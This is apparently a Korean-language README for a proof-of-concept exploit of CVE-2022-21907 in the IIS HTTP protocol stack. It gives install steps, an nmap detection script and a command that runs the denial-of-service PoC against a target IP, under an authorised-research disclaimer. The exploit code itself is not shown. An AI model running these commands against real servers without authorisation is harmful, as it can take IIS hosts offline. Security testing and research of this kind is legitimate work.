
HTTP 프로토콜 스택(IIS)의 원격 코드 실행 취약점인 CVE-2022-21907에 대한 개념 증명 익스플로잇입니다. 탐지 및 악용을 위한 Python 스크립트와 Nmap 스크립트가 포함됩니다.
⚠️ 교육 및 허가된 보안 연구 목적으로만 사용하세요
원본 PoC 작성자 NU11SECURITY 및 michelep에게 깊은 감사를 드립니다
HTTP 프로토콜 스택 원격 코드 실행 취약점입니다. 이 취약점은 IIS 웹 서버가 있는 대상 시스템에 서비스 거부(DoS) 공격을 유발할 수 있습니다.
git을 설치한 다음 GitHub 저장소에서 PoC를 클론하세요:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
pip3 명령을 사용하여 요구 사항을 설치하세요:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
다음 명령을 사용하여 대상 머신의 취약점 존재 여부를 확인하세요:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
그런 다음 다음 명령을 사용하여 PoC 스크립트를 실행하세요:
python3 CVE-2022-21907.py -i 10.10.1.10
참고: -i 옵션에 대상 IP 주소를 지정하세요